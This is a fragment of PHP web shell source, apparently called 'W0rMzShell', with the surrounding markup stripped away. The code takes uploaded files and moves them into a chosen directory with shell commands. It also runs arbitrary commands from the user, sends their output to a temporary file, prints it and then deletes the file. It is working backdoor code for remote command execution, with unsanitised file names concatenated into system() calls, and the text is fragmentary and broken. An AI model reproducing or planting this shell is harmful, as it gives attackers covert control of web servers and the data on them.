System: UserInfo: UpTime:
"; } else { print "UpLoad Error!
";
system("chmod 644 ".$_FILES['_upl']['tmp_name']." 2>&1");
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
system("ls -al ".$currentWD." 2>&1");
print ""; } } else { print "UpLoad Successfully!
";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system("$currentCMD 1> /tmp/W0rMzShell 2>&1; cat /tmp/W0rMzShell; rm -rf /tmp/W0rMzShell");
print "